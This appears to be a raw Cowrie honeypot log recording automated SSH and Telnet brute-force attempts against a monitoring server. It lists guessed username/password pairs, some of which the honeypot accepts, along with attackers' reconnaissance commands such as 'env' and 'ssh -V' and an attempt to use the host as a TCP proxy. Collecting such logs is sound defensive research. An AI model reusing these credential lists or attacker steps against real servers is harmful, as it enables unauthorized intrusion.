{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:00:53.738936Z","src_ip":"212.227.125.160","session":"d66a4d1b7b02"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"letmein","message":"login attempt [dspace/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:00:56.533696Z","src_ip":"212.227.125.160","session":"d66a4d1b7b02"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:00:57.967420Z","src_ip":"212.227.125.160","session":"d66a4d1b7b02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50130,"dst_ip":"1.2.3.4","dst_port":22,"session":"7347f56b5b8d","protocol":"ssh","message":"New connection: 212.227.125.160:50130 (1.2.3.4:22) [session: 7347f56b5b8d]","sensor":"my-vps","timestamp":"2025-08-31T02:01:05.870040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:01:07.593922Z","src_ip":"212.227.125.160","session":"7347f56b5b8d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:01:07.594830Z","src_ip":"212.227.125.160","session":"7347f56b5b8d"}
{"eventid":"cowrie.login.success","username":"root","password":"N0v4Pr0n3r","message":"login attempt [root/N0v4Pr0n3r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:01:13.793484Z","src_ip":"212.227.125.160","session":"7347f56b5b8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:01:16.489135Z","src_ip":"212.227.125.160","session":"7347f56b5b8d"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T02:01:16.489921Z","src_ip":"212.227.125.160","session":"7347f56b5b8d"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":48866,"dst_ip":"1.2.3.4","dst_port":23,"session":"595861ac714d","protocol":"telnet","message":"New connection: 176.65.149.186:48866 (1.2.3.4:23) [session: 595861ac714d]","sensor":"my-vps","timestamp":"2025-08-31T02:01:17.192502Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:01:17.234070Z","src_ip":"176.65.149.186","session":"595861ac714d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:01:17.252060Z","src_ip":"176.65.149.186","session":"595861ac714d"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-31T02:01:17.253296Z","src_ip":"176.65.149.186","session":"595861ac714d"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-31T02:01:17.254357Z","src_ip":"176.65.149.186","session":"595861ac714d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:01:18.313123Z","src_ip":"212.227.125.160","session":"7347f56b5b8d"}
{"eventid":"cowrie.session.closed","duration":"12.4","message":"Connection lost after 12.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:01:18.314352Z","src_ip":"212.227.125.160","session":"7347f56b5b8d"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":47050,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e86072428d8","protocol":"ssh","message":"New connection: 201.148.180.50:47050 (1.2.3.4:22) [session: 5e86072428d8]","sensor":"my-vps","timestamp":"2025-08-31T02:01:24.767727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:01:25.839172Z","src_ip":"201.148.180.50","session":"5e86072428d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:01:25.840302Z","src_ip":"201.148.180.50","session":"5e86072428d8"}
{"eventid":"cowrie.login.success","username":"root","password":"N0v4Pr0n3r","message":"login attempt [root/N0v4Pr0n3r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:01:32.552944Z","src_ip":"201.148.180.50","session":"5e86072428d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:01:34.669239Z","src_ip":"201.148.180.50","session":"5e86072428d8"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T02:01:34.670104Z","src_ip":"201.148.180.50","session":"5e86072428d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53202,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed4f21ab77fd","protocol":"ssh","message":"New connection: 212.227.235.229:53202 (1.2.3.4:22) [session: ed4f21ab77fd]","sensor":"my-vps","timestamp":"2025-08-31T02:01:35.028339Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:01:36.321220Z","src_ip":"201.148.180.50","session":"5e86072428d8"}
{"eventid":"cowrie.session.closed","duration":"11.6","message":"Connection lost after 11.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:01:36.322366Z","src_ip":"201.148.180.50","session":"5e86072428d8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:01:36.440804Z","src_ip":"212.227.235.229","session":"ed4f21ab77fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:01:36.478077Z","src_ip":"212.227.235.229","session":"ed4f21ab77fd"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"welcome","message":"login attempt [dspace/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:01:41.865258Z","src_ip":"212.227.235.229","session":"ed4f21ab77fd"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:01:43.647211Z","src_ip":"212.227.235.229","session":"ed4f21ab77fd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59462,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7ada7eeed9f","protocol":"ssh","message":"New connection: 217.72.205.35:59462 (1.2.3.4:22) [session: d7ada7eeed9f]","sensor":"my-vps","timestamp":"2025-08-31T02:01:50.130928Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:01:50.132838Z","src_ip":"217.72.205.35","session":"d7ada7eeed9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43472,"dst_ip":"1.2.3.4","dst_port":22,"session":"175428ef180e","protocol":"ssh","message":"New connection: 212.227.125.160:43472 (1.2.3.4:22) [session: 175428ef180e]","sensor":"my-vps","timestamp":"2025-08-31T02:01:56.411757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:01:57.142729Z","src_ip":"212.227.125.160","session":"175428ef180e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:01:57.143784Z","src_ip":"212.227.125.160","session":"175428ef180e"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"welcome","message":"login attempt [dspace/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:01:59.385508Z","src_ip":"212.227.125.160","session":"175428ef180e"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:02:00.921418Z","src_ip":"212.227.125.160","session":"175428ef180e"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":57584,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3274071153c","protocol":"ssh","message":"New connection: 115.190.94.119:57584 (1.2.3.4:22) [session: c3274071153c]","sensor":"my-vps","timestamp":"2025-08-31T02:02:10.794746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:02:10.795951Z","src_ip":"115.190.94.119","session":"c3274071153c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T02:02:11.003360Z","src_ip":"115.190.94.119","session":"c3274071153c"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"qweasd123","message":"login attempt [ubuntu/qweasd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:02:11.898166Z","src_ip":"115.190.94.119","session":"c3274071153c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35275,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6681164f558","protocol":"ssh","message":"New connection: 77.83.207.83:35275 (1.2.3.4:22) [session: d6681164f558]","sensor":"my-vps","timestamp":"2025-08-31T02:02:23.474029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T02:02:23.475074Z","src_ip":"77.83.207.83","session":"d6681164f558"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T02:02:23.524795Z","src_ip":"77.83.207.83","session":"d6681164f558"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:02:23.772881Z","src_ip":"77.83.207.83","session":"d6681164f558"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4869,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4869","sensor":"my-vps","timestamp":"2025-08-31T02:02:23.823690Z","session":"d6681164f558"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:02:23.873420Z","src_ip":"77.83.207.83","session":"d6681164f558"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":9845,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:9845","sensor":"my-vps","timestamp":"2025-08-31T02:02:24.015937Z","session":"d6681164f558"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:02:24.065560Z","src_ip":"77.83.207.83","session":"d6681164f558"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":10092,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10092","sensor":"my-vps","timestamp":"2025-08-31T02:02:24.208020Z","session":"d6681164f558"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:02:24.257948Z","src_ip":"77.83.207.83","session":"d6681164f558"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:02:24.308364Z","src_ip":"77.83.207.83","session":"d6681164f558"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34078,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bcf3339faca","protocol":"ssh","message":"New connection: 212.227.235.229:34078 (1.2.3.4:22) [session: 1bcf3339faca]","sensor":"my-vps","timestamp":"2025-08-31T02:02:36.192580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:02:36.934417Z","src_ip":"212.227.235.229","session":"1bcf3339faca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:02:36.935588Z","src_ip":"212.227.235.229","session":"1bcf3339faca"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"abc123","message":"login attempt [dspace/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:02:43.104547Z","src_ip":"212.227.235.229","session":"1bcf3339faca"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:02:45.008995Z","src_ip":"212.227.235.229","session":"1bcf3339faca"}
